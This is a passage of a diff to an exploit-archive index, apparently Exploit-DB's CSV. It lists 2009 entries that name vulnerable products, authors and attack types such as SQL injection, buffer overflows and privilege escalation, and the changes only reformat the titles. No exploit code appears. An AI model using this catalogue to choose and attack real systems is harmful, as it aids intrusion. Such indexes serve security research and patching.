8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (CSRF) Change Admin Pass",2009-03-03,Stack,windows,remote,0 @@ -7676,7 +7676,7 @@ id,file,description,date,author,platform,type,port 8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 - File Disclosure",2009-03-04,Stack,windows,remote,0 8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption PoC",2009-03-04,Stack,windows,dos,0 8158,platforms/windows/local/8158.pl,"Winamp 5.541 - Skin Universal Buffer Overflow Exploit",2009-03-05,SkD,windows,local,0 -8159,platforms/windows/local/8159.rb,"Media Commands .m3l File Local Buffer Overflow Exploit",2009-03-05,Stack,windows,local,0 +8159,platforms/windows/local/8159.rb,"Media Commands - .m3l File Local Buffer Overflow Exploit",2009-03-05,Stack,windows,local,0 8160,platforms/windows/remote/8160.html,"SupportSoft DNA Editor Module - (dnaedit.dll) Code Execution Exploit",2009-03-05,Nine:Situations:Group,windows,remote,0 8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0 8162,platforms/windows/local/8162.py,"Media Commands - (.m3u) Universal SEH Overwrite Exploit",2009-03-05,His0k4,windows,local,0 @@ -7720,14 +7720,14 @@ id,file,description,date,author,platform,type,port 8203,platforms/windows/remote/8203.pl,"POP Peeper 3.4.0.0 Date Remote Buffer Overflow Exploit",2009-03-12,"Jeremy Brown",windows,remote,0 8204,platforms/php/webapps/8204.txt,"phpmysport 1.4 - (XSS/SQL) Multiple Vulnerabilities",2009-03-12,XaDoS,php,webapps,0 8205,platforms/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow PoC",2009-03-12,n3tpr0b3,linux,dos,0 -8206,platforms/windows/remote/8206.html,"GeoVision LiveAudio ActiveX Remote Freed-Memory Access Exploit",2009-03-13,Nine:Situations:Group,windows,remote,0 +8206,platforms/windows/remote/8206.html,"GeoVision LiveAudio - ActiveX Remote Freed-Memory Access Exploit",2009-03-13,Nine:Situations:Group,windows,remote,0 8207,platforms/php/webapps/8207.txt,"YAP 1.1.1 - (index.php page) Local File Inclusion",2009-03-13,Alkindiii,php,webapps,0 8208,platforms/windows/remote/8208.html,"Morovia Barcode ActiveX 3.6.2 - (MrvBarCd.dll) Insecure Method Exploit",2009-03-13,Cyber-Zone,windows,remote,0 8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - (Auth Bypass) SQL Injection",2009-03-13,"Virangar Security",php,webapps,0 8210,platforms/php/webapps/8210.txt,"UBB.threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0 8211,platforms/windows/remote/8211.pl,"Serv-U 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit",2009-03-16,"Jonathan Salwan",windows,remote,0 8212,platforms/windows/dos/8212.pl,"Serv-U 7.4.0.1 - (SMNT) Denial of Service (post auth)",2009-03-16,"Jonathan Salwan",windows,dos,0 -8213,platforms/windows/dos/8213.pl,"VLC 0.9.8a Web UI (input) Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0 +8213,platforms/windows/dos/8213.pl,"VLC 0.9.8a - Web UI (input) Remote Denial of Service",2009-03-16,TheLeader,windows,dos,0 8214,platforms/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow Exploit (multi target)",2009-03-16,SimO-s0fT,windows,local,0 8215,platforms/windows/remote/8215.txt,"PPLive 1.9.21 - (/LoadModule) URI Handlers Argument Injection",2009-03-16,Nine:Situations:Group,windows,remote,0 8216,platforms/php/webapps/8216.txt,"Beerwin's PHPLinkAdmin 1.0 - RFI/SQL Injection",2009-03-16,SirGod,php,webapps,0 @@ -7805,7 +7805,7 @@ id,file,description,date,author,platform,type,port 8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script (Auth Bypass) - SQL Injection",2009-03-27,Qabandi,php,webapps,0 8294,platforms/windows/dos/8294.c,"XM Easy Personal FTP Server 5.7.0 - (NLST) Denial of Service",2009-03-27,"Jonathan Salwan",windows,dos,0 8295,platforms/windows/remote/8295.pl,"FreeSSHd 1.2.1 - (rename) Remote Buffer Overflow Exploit (SEH)",2009-03-27,r0ut3r,windows,remote,22 -8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script (username) Static XSS",2009-03-27,"Anarchy Angel",php,webapps,0 +8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - (username) Static XSS",2009-03-27,"Anarchy Angel",php,webapps,0 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0 8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - (LFI) Remote Command Execution Exploit",2009-03-27,Osirys,php,webapps,0 8299,platforms/windows/local/8299.py,"Abee Chm Maker 1.9.5 - (.CMP) Stack Overflow Exploit",2009-03-27,"Encrypt3d.M!nd ",windows,local,0 @@ -7834,7 +7834,7 @@ id,file,description,date,author,platform,type,port 8322,platforms/windows/local/8322.txt,"Trend Micro Internet Security Pro 2009 - Priviliege Escalation PoC",2009-03-30,b1@ckeYe,windows,local,0 8323,platforms/php/webapps/8323.txt,"Community CMS 0.5 - Multiple SQL Injection",2009-03-31,"Salvatore Fresta",php,webapps,0 8324,platforms/php/webapps/8324.php,"Podcast Generator 1.1 - Remote Code Execution Exploit",2009-03-31,BlackHawk,php,webapps,0 -8325,platforms/windows/dos/8325.py,"Safari 3.2.2/4b (nested elements) XML Parsing Remote Crash Exploit",2009-03-31,"Ahmed Obied",windows,dos,0 +8325,platforms/windows/dos/8325.py,"Safari 3.2.2/4b - (nested elements) XML Parsing Remote Crash Exploit",2009-03-31,"Ahmed Obied",windows,dos,0 8326,platforms/php/webapps/8326.rb,"VirtueMart 1.1.2 - SQL Injection Exploit (Metasploit)",2009-03-31,waraxe,php,webapps,0 8327,platforms/php/webapps/8327.txt,"virtuemart 1.1.2 - Multiple Vulnerabilities",2009-03-31,waraxe,php,webapps,0 8328,platforms/php/webapps/8328.txt,"webEdition 6.0.0.4 - (WE_LANGUAGE) Local File Inclusion",2009-03-31,"Salvatore Fresta",php,webapps,0 @@ -7859,7 +7859,7 @@ id,file,description,date,author,platform,type,port 8347,platforms/php/webapps/8347.php,"glFusion 1.1.2 COM_applyFilter()/cookies Blind SQL Injection Exploit",2009-04-03,Nine:Situations:Group,php,webapps,0 8348,platforms/php/webapps/8348.txt,"form2list - (page.php id) SQL Injection",2009-04-03,Cyber-Zone,php,webapps,0 8349,platforms/php/webapps/8349.c,"Family Connections 1.8.2 - Remote Shell Upload Exploit",2009-04-03,"Salvatore Fresta",php,webapps,0 -8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b SQL Injection / Post Auth Code Execution",2009-04-03,brain[pillow],php,webapps,0 +8350,platforms/php/webapps/8350.txt,"Gravity Board X 2.0b - SQL Injection / Post Auth Code Execution",2009-04-03,brain[pillow],php,webapps,0 8351,platforms/php/webapps/8351.pl,"AdaptBB 1.0 - (topic_id) SQL Injection / Credentials Disclosure Exploit",2009-04-03,StAkeR,php,webapps,0 8352,platforms/windows/dos/8352.txt,"Amaya 11.1 XHTML Parser Remote Buffer Overflow PoC",2009-04-06,cicatriz,windows,dos,0 8353,platforms/php/webapps/8353.txt,"Joomla Component com_bookjoomlas 0.1 - SQL Injection",2009-04-06,"Salvatore Fresta",php,webapps,0 @@ -7877,7 +7877,7 @@ id,file,description,date,author,platform,type,port 8365,platforms/php/webapps/8365.txt,"Joomla Component Maian Music 1.2.1 - (category) SQL Injection",2009-04-08,H!tm@N,php,webapps,0 8366,platforms/php/webapps/8366.txt,"Joomla Component MailTo - (article) SQL Injection",2009-04-08,H!tm@N,php,webapps,0 8367,platforms/php/webapps/8367.txt,"Joomla Component Cmimarketplace - (viewit) Directory Traversal",2009-04-08,H!tm@N,php,webapps,0 -8368,platforms/windows/remote/8368.txt,"peterConnects Web Server Traversal Arbitrary File Access",2009-04-08,"Bugs NotHugs",windows,remote,0 +8368,platforms/windows/remote/8368.txt,"peterConnects Web Server Traversal - Arbitrary File Access",2009-04-08,"Bugs NotHugs",windows,remote,0 8369,platforms/linux/local/8369.sh,"Linux Kernel < 2.6.29 - exit_notify() Local Privilege Escalation Exploit",2009-04-08,gat3way,linux,local,0 8370,platforms/windows/dos/8370.pl,"GOM Player 2.1.16.6134 Subtitle Local Buffer Overflow PoC",2009-04-08,"Bui Quang Minh",windows,dos,0 8371,platforms/windows/local/8371.pl,"OTSTurntables 1.00.027 - (.m3u/.ofl) Universal BoF Exploit",2009-04-08,AlpHaNiX,windows,local,0 @@ -7898,7 +7898,7 @@ id,file,description,date,author,platform,type,port 8388,platforms/php/webapps/8388.txt,"PHP-Agenda 2.2.5 - Remote File Overwriting",2009-04-10,"Salvatore Fresta",php,webapps,0 8389,platforms/php/webapps/8389.txt,"Loggix Project 9.4.5 - (refer_id) Blind SQL Injection",2009-04-10,"Salvatore Fresta",php,webapps,0 8390,platforms/windows/dos/8390.cpp,"Xilisoft Video Converter Wizard 3 - (.cue) Stack Buffer Overflow PoC",2009-04-10,"fl0 fl0w",windows,dos,0 -8391,platforms/windows/dos/8391.txt,"Chance-i DiViS-Web DVR System ActiveX Control Heap Overflow PoC",2009-04-10,DSecRG,windows,dos,0 +8391,platforms/windows/dos/8391.txt,"Chance-i DiViS-Web DVR System - ActiveX Control Heap Overflow PoC",2009-04-10,DSecRG,windows,dos,0 8392,platforms/windows/remote/8392.txt,"Chance-i DiViS DVR System Web-server Directory Traversal",2009-04-10,DSecRG,windows,remote,0 8393,platforms/hardware/dos/8393.txt,"Cisco ASA/PIX Appliances Fail to Properly Check Fragmented TCP Packets",2009-04-10,"Daniel Clemens",hardware,dos,0 8394,platforms/php/webapps/8394.txt,"mozilocms 1.11 - (LFI/pd/XSS) Multiple Vulnerabilities",2009-04-10,SirGod,php,webapps,0 @@ -7935,7 +7935,7 @@ id,file,description,date,author,platform,type,port 8426,platforms/windows/local/8426.pl,"Shadow Stream Recorder - (.m3u) Universal Stack Overflow Exploit",2009-04-14,AlpHaNiX,windows,local,0 8427,platforms/windows/local/8427.py,"Easy RM to MP3 Converter - Universal Stack Overflow Exploit",2009-04-14,Stack,windows,local,0 8428,platforms/windows/remote/8428.txt,"MonGoose 2.4 (Windows) - Webserver Directory Traversal",2009-04-14,e.wiZz!,windows,remote,0 -8429,platforms/multiple/dos/8429.pl,"Steamcast 0.9.75b Remote Denial of Service",2009-04-14,ksa04,multiple,dos,0 +8429,platforms/multiple/dos/8429.pl,"Steamcast 0.9.75b - Remote Denial of Service",2009-04-14,ksa04,multiple,dos,0 8430,platforms/openbsd/dos/8430.py,"OpenBSD 4.5 IP datagram Null Pointer Deref Denial of Service",2009-04-14,nonroot,openbsd,dos,0 8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 - (index.php lang) Local File Inclusion",2009-04-14,SirGod,php,webapps,0 8432,platforms/php/webapps/8432.txt,"Aqua CMS - (username) SQL Injection",2009-04-14,halkfild,php,webapps,0 @@ -7958,7 +7958,7 @@ id,file,description,date,author,platform,type,port 8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 - (Auth Bypass) SQL Injection",2009-04-16,Dns-Team,php,webapps,0 8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,php,webapps,0 8451,platforms/windows/dos/8451.pl,"Apollo 37zz - (.m3u) Local Heap Overflow PoC",2009-04-16,Cyber-Zone,windows,dos,0 -8452,platforms/windows/dos/8452.c,"Elecard AVC HD Player .XPL Stack Buffer Overflow (SEH) PoC",2009-04-16,"fl0 fl0w",windows,dos,0 +8452,platforms/windows/dos/8452.c,"Elecard AVC HD Player - .XPL Stack Buffer Overflow (SEH) PoC",2009-04-16,"fl0 fl0w",windows,dos,0 8453,platforms/php/webapps/8453.txt,"webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing",2009-04-16,YEnH4ckEr,php,webapps,0 8454,platforms/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps,0 8455,platforms/php/webapps/8455.txt,"cpCommerce 1.2.8 - (id_document) Blind SQL Injection",2009-04-16,NoGe,php,webapps,0 @@ -7972,7 +7972,7 @@ id,file,description,date,author,platform,type,port 8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Remote Directory Traversal",2009-04-16,e.wiZz!,windows,remote,0 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - (Auth Bypass) SQL Injection",2009-04-17,"Salvatore Fresta",php,webapps,0 8465,platforms/windows/dos/8465.pl,"Microsoft Media Player - (quartz.dll .mid) Denial of Service",2009-04-17,"Code Audit Labs",windows,dos,0 -8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC",2009-04-17,"Code Audit Labs",windows,dos,0 +8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin - .png Infinite Loop Denial of Service PoC",2009-04-17,"Code Audit Labs",windows,dos,0 8467,platforms/windows/dos/8467.pl,"Microsoft Media Player - (quartz.dll .wav) Multiple Remote DoS Vulnerabilities",2009-04-17,"Code Audit Labs",windows,dos,0 8468,platforms/php/webapps/8468.txt,"Limbo CMS 1.0.4.2 - CSRF Privilege Escalation PoC",2009-04-17,"Alfons Luja",php,webapps,0 8469,platforms/linux/dos/8469.c,"XRDP 0.4.1 - Remote Buffer Overflow PoC (pre-auth)",2009-04-17,"joe walko",linux,dos,0 @@ -7980,7 +7980,7 @@ id,file,description,date,author,platform,type,port 8471,platforms/php/webapps/8471.txt,"ClanTiger < 1.1.1 - Multiple Cookie Handling Vulnerabilities",2009-04-17,YEnH4ckEr,php,webapps,0 8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - (Auth Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 8473,platforms/php/webapps/8473.pl,"ClanTiger 1.1.1 - (slug) Blind SQL Injection Exploit",2009-04-17,YEnH4ckEr,php,webapps,0 -8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps,0 +8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart - Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps,0 8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection",2009-04-17,HCOCA_MAN,php,webapps,0 @@ -7993,11 +7993,11 @@ id,file,description,date,author,platform,type,port 8484,platforms/windows/dos/8484.pl,"1by1 1.67 - (.m3u) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0 8485,platforms/windows/dos/8485.pl,"Groovy Media Player 1.1.0 - (.m3u) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0 8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 - (Auth Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 -8487,platforms/php/webapps/8487.txt,"EZ Webitor (Auth Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0 +8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Auth Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0 8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 - (editlink.php id) Blind SQL Injection Exploit",2009-04-20,"Rohit Bansal",php,webapps,0 8489,platforms/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - (.m3u) Local Stack Overflow PoC",2009-04-20,GoLd_M,windows,dos,0 8490,platforms/hardware/dos/8490.sh,"Addonics NAS Adapter - (bts.cgi) Remote Denial of Service (Post-Auth)",2009-04-20,h00die,hardware,dos,0 -8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b (Insecure Cookie Handling) Blind SQL Injection Exploit",2009-04-20,YEnH4ckEr,php,webapps,0 +8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection Exploit",2009-04-20,YEnH4ckEr,php,webapps,0 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0 8493,platforms/php/webapps/8493.txt,"fungamez rc1 - (ab/LFI) Multiple Vulnerabilities",2009-04-20,YEnH4ckEr,php,webapps,0 8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 - (inc_dir) Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps,0 @@ -8043,7 +8043,7 @@ id,file,description,date,author,platform,type,port 8535,platforms/windows/local/8535.pl,"Destiny Media Player 1.61 - (.rdl) Local Buffer Overflow Exploit",2009-04-27,G4N0K,windows,local,0 8536,platforms/windows/local/8536.py,"SDP Downloader 2.3.0 - (.ASX) Local Buffer Overflow Exploit (SEH)",2009-04-27,His0k4,windows,local,0 8537,platforms/windows/remote/8537.txt,"dwebpro 6.8.26 - (dt/fd) Multiple Vulnerabilities",2009-04-27,"Alfons Luja",windows,remote,0 -8538,platforms/php/webapps/8538.txt,"Invision Power Board 3.0.0b5 Active XSS / Path Disclosure",2009-04-27,brain[pillow],php,webapps,0 +8538,platforms/php/webapps/8538.txt,"Invision Power Board 3.0.0b5 - Active XSS / Path Disclosure",2009-04-27,brain[pillow],php,webapps,0 8539,platforms/php/webapps/8539.txt,"Opencart 1.1.8 - (route) Local File Inclusion",2009-04-27,OoN_Boy,php,webapps,0 8540,platforms/windows/local/8540.c,"SDP Downloader 2.3.0 - (.ASX) Local Buffer Overflow Exploit (SEH) (2)",2009-04-27,SimO-s0fT,windows,local,0 8541,platforms/windows/local/8541.php,"Zoom Player Pro 3.30 - (.m3u) File Buffer Overflow Exploit (seh)",2009-04-27,Nine:Situations:Group,windows,local,0 @@ -8065,24 +8065,24 @@ id,file,description,date,author,platform,type,port 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection",2009-04-28,YEnH4ckEr,php,webapps,0 8559,platforms/php/webapps/8559.c,"webSPELL 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0 -8560,platforms/windows/remote/8560.html,"Autodesk IDrop ActiveX Remote Code Execution Exploit",2009-04-28,Elazar,windows,remote,0 +8560,platforms/windows/remote/8560.html,"Autodesk IDrop - ActiveX Remote Code Execution Exploit",2009-04-28,Elazar,windows,remote,0 8561,platforms/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 - Arbitrary File Disclosure Exploit",2009-04-28,Cyber-Zone,windows,remote,0 8562,platforms/windows/remote/8562.html,"Symantec Fax Viewer Control 10 - (DCCFAXVW.DLL) Remote BoF Exploit",2009-04-29,Nine:Situations:Group,windows,remote,0 8563,platforms/php/webapps/8563.txt,"eLitius 1.0 - (banner-details.php id) SQL Injection",2009-04-29,snakespc,php,webapps,0 8564,platforms/windows/remote/8564.pl,"Baby Web Server 2.7.2.0 - Arbitrary File Disclosure Exploit",2009-04-29,ZoRLu,windows,remote,0 8565,platforms/php/webapps/8565.txt,"ProjectCMS 1.0b - (index.php sn) SQL Injection",2009-04-29,YEnH4ckEr,php,webapps,0 -8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable (page) Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0 +8566,platforms/php/webapps/8566.txt,"S-CMS 1.1 Stable - (page) Local File Inclusion",2009-04-29,ZoRLu,php,webapps,0 8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0 8568,platforms/windows/dos/8568.pl,"mpegable Player 2.12 - (.YUV) Local Stack Overflow PoC",2009-04-29,GoLd_M,windows,dos,0 8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 - GetAnnots() Remote Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 - customDictionaryOpen() Code Execution Exploit",2009-04-29,Arr1val,linux,remote,0 -8571,platforms/php/webapps/8571.txt,"Tiger Dms (Auth Bypass) SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0 +8571,platforms/php/webapps/8571.txt,"Tiger Dms - (Auth Bypass) SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0 8572,platforms/linux/local/8572.c,"Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Local Privilege Escalation Exploit (2)",2009-04-30,"Jon Oberheide",linux,local,0 8573,platforms/windows/dos/8573.html,"Google Chrome 1.0.154.53 - (Null Pointer) Remote Crash Exploit",2009-04-30,"Aditya K Sood",windows,dos,0 8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 - (searchterm) Blind SQL Injection Exploit",2009-04-30,YEnH4ckEr,php,webapps,0 8577,platforms/php/webapps/8577.txt,"leap CMS 0.1.4 - (SQL/XSS/su) Multiple Vulnerabilities",2009-04-30,YEnH4ckEr,php,webapps,0 8578,platforms/windows/dos/8578.pl,"Mercury Audio Player 1.21 - (.M3U) Local Stack Overflow PoC",2009-04-30,SirGod,windows,dos,0 -8579,platforms/windows/remote/8579.html,"BaoFeng ActiveX OnBeforeVideoDownload() Remote BoF Exploit",2009-04-30,MITBOY,windows,remote,0 +8579,platforms/windows/remote/8579.html,"BaoFeng - ActiveX OnBeforeVideoDownload() Remote BoF Exploit",2009-04-30,MITBOY,windows,remote,0 8580,platforms/windows/local/8580.py,"Mercury Audio Player 1.21 - (.b4s) Local Stack Overflow Exploit",2009-04-30,His0k4,windows,local,0 8581,platforms/bsd/dos/8581.txt,"Multiple Vendor - PF Null Pointer Dereference",2009-04-30,Rembrandt,bsd,dos,0 8582,platforms/windows/local/8582.py,"Mercury Audio Player 1.21 - (.pls) SEH Overwrite Exploit",2009-04-30,His0k4,windows,local,0 @@ -8090,7 +8090,7 @@ id,file,description,date,author,platform,type,port 8584,platforms/hardware/dos/8584.py,"Addonics NAS Adapter FTP Remote Denial of Service",2009-05-01,h00die,hardware,dos,0 8585,platforms/php/webapps/8585.txt,"Golabi CMS 1.0.1 Session Poisoning",2009-05-01,CrazyAngel,php,webapps,0 8586,platforms/php/webapps/8586.txt,"MiniTwitter 0.2b - Multiple SQL Injection",2009-05-01,YEnH4ckEr,php,webapps,0 -8587,platforms/php/webapps/8587.htm,"MiniTwitter 0.2b Remote User Options Changer Exploit",2009-05-01,YEnH4ckEr,php,webapps,0 +8587,platforms/php/webapps/8587.htm,"MiniTwitter 0.2b - Remote User Options Changer Exploit",2009-05-01,YEnH4ckEr,php,webapps,0 8588,platforms/windows/dos/8588.pl,"Beatport Player 1.0.0.283 - (.M3U) Local Buffer Overflow PoC",2009-05-01,SirGod,windows,dos,0 8589,platforms/windows/local/8589.py,"RM Downloader - (.smi) Local Stack Overflow Exploit",2009-05-01,"ThE g0bL!N",windows,local,0 8590,platforms/windows/local/8590.py,"Beatport Player 1.0.0.283 - (.m3u) Local SEH Overwrite Exploit",2009-05-01,His0k4,windows,local,0 @@ -8099,7 +8099,7 @@ id,file,description,date,author,platform,type,port 8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 - (index.php language) Local File Inclusion",2009-05-01,SirGod,php,webapps,0 8594,platforms/windows/local/8594.pl,"RM Downloader - (.smi) Universal Local Buffer Overflow Exploit",2009-05-01,Stack,windows,local,0 8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 < 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0 -8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0 +8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b - Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0 8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris - (dtrace) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0 8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris - (fasttrap) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0 8599,platforms/php/webapps/8599.txt,"AGTC MyShop 3.2 - Insecure Cookie Handling",2009-05-04,Mr.tro0oqy,php,webapps,0 @@ -8138,7 +8138,7 @@ id,file,description,date,author,platform,type,port 8632,platforms/windows/local/8632.pl,"Mini-stream Ripper 3.0.1.1 - (.asx) (HREF) Local BoF Exploit",2009-05-07,G4N0K,windows,local,0 8633,platforms/windows/local/8633.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - (.RAM) Local BoF Exploit",2009-05-07,G4N0K,windows,local,0 8634,platforms/windows/local/8634.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - (.asx) Local BoF Exploit",2009-05-07,G4N0K,windows,local,0 -8635,platforms/php/webapps/8635.txt,"VIDEOSCRIPT.us (Auth Bypass) SQL Injection",2009-05-07,snakespc,php,webapps,0 +8635,platforms/php/webapps/8635.txt,"VIDEOSCRIPT.us - (Auth Bypass) SQL Injection",2009-05-07,snakespc,php,webapps,0 8636,platforms/php/webapps/8636.txt,"ST-Gallery 0.1a - Multiple SQL Injection",2009-05-07,YEnH4ckEr,php,webapps,0 8637,platforms/windows/local/8637.pl,"GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit",2009-05-07,"Jeremy Brown",windows,local,0 8638,platforms/php/webapps/8638.htm,"Simple Customer 1.3 - Arbitrary Change Admin Password Exploit",2009-05-07,ahmadbady,php,webapps,0 @@ -8148,7 +8148,7 @@ id,file,description,date,author,platform,type,port 8642,platforms/php/webapps/8642.txt,"The Recipe Script 5 - (Auth Bypass) SQL Injection / DB Backup",2009-05-08,TiGeR-Dz,php,webapps,0 8643,platforms/php/webapps/8643.txt,"Realty Web-Base 1.0 - (Auth Bypass) SQL Injection",2009-05-08,"ThE g0bL!N",php,webapps,0 8644,platforms/windows/dos/8644.pl,"ViPlay3 <= 3.00 - (.vpl) Local Stack Overflow PoC",2009-05-08,LiquidWorm,windows,dos,0 -8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable (Auth Bypass) SQL Injection",2009-05-08,knxone,php,webapps,0 +8645,platforms/php/webapps/8645.txt,"Luxbum 0.5.5/stable - (Auth Bypass) SQL Injection",2009-05-08,knxone,php,webapps,0 8646,platforms/multiple/dos/8646.php,"Mortbay Jetty 7.0.0-pre5 Dispatcher Servlet Denial of Service",2009-05-08,ikki,multiple,dos,0 8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - (uploadform.asp) Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0 8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - (AlbumID) Blind SQL Injection Exploit",2009-05-08,YEnH4ckEr,php,webapps,0 @@ -8186,7 +8186,7 @@ id,file,description,date,author,platform,type,port 8680,platforms/php/webapps/8680.txt,"beLive 0.2.3 (arch.php arch) Local File Inclusion",2009-05-14,Kacper,php,webapps,0 8681,platforms/php/webapps/8681.php,"StrawBerry 1.1.1 - LFI / Remote Command Execution Exploit",2009-05-14,[AVT],php,webapps,0 8682,platforms/php/webapps/8682.txt,"MRCGIGUY ClickBank Directory 1.0.1 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0 -8683,platforms/php/webapps/8683.txt,"Submitter Script (Auth Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0 +8683,platforms/php/webapps/8683.txt,"Submitter Script - (Auth Bypass) SQL Injection",2009-05-14,"ThE g0bL!N",php,webapps,0 8684,platforms/php/webapps/8684.txt,"MRCGIGUY Hot Links SQL 3.2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0 8685,platforms/php/webapps/8685.txt,"MRCGIGUY Amazon Directory 1.0/2.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0 8686,platforms/php/webapps/8686.txt,"MRCGIGUY Message Box 1.0 - Insecure Cookie Handling",2009-05-14,TiGeR-Dz,php,webapps,0 @@ -8211,7 +8211,7 @@ id,file,description,date,author,platform,type,port 8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - (ab/XSS/SQL) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - (ab/SQL/XSS) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 - Remote Blind SQL Injection",2009-05-18,Qabandi,php,webapps,0 -8710,platforms/php/webapps/8710.txt,"PHP Dir Submit (Auth Bypass) SQL Injection",2009-05-18,snakespc,php,webapps,0 +8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - (Auth Bypass) SQL Injection",2009-05-18,snakespc,php,webapps,0 8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - (pid) SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 8712,platforms/windows/dos/8712.txt,"httpdx 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0 8713,platforms/php/webapps/8713.txt,"coppermine photo gallery 1.4.22 - Multiple 